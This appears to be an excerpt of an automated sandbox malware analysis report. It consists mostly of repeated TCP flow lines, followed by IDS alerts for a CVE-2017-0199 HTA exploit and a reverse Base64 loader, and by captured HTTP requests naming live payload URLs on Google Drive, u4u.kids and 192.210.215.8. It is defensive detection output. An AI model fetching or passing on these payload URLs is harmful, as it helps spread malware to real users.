Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165
Source: global traffic TCP traffic: 192.210.215.8:80 -> 192.168.2.22:49165

Networking

barindex
Source: Network traffic Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.210.215.8:80 -> 192.168.2.22:49164
Source: Network traffic Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.210.215.8:80 -> 192.168.2.22:49162
Source: Network traffic Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.250.186.97:443 -> 192.168.2.22:49172
Source: Network traffic Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.250.186.97:443 -> 192.168.2.22:49174
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /540/ERFFDR.txt HTTP/1.1Host: 192.210.215.8Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /540/ERFFDR.txt HTTP/1.1Host: 192.210.215.8Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 24.199.88.84 24.199.88.84
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Network traffic Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49170 -> 192.210.215.8:80
Source: Network traffic Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 192.210.215.8:80
Source: Network traffic Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49162 -> 192.210.215.8:80
Source: global traffic HTTP traffic detected: GET /LUSVbx?&trinket=nice&dynamo=quizzical&job=uppity&imagination=modern&flute=boiling&SUV=motionless&specific=troubled&skyscraper=uninterested&bottling HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: u4u.kidsConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /LUSVbx?&trinket=nice&dynamo=quizzical&job=uppity&imagination=modern&flute=boiling&SUV=motionless&specific=troubled&skyscraper=uninterested&bottling HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: u4u.kidsConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /LUSVbx?&trinket=nice&dynamo=quizzical&job=uppity&imagination=modern&flute=boiling&SUV=motionless&specific=troubled&skyscraper=uninterested&bottling HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: u4u.kidsConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /LUSVbx?&trinket=nice&dynamo=quizzical&job=uppity&imagination=modern&flute=boiling&SUV=motionless&specific=troubled&skyscraper=uninterested&bottling HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: u4u.kidsConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.210.215.8Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 192.210.215.8If-Range: "20b6a-6251ccc7de906"
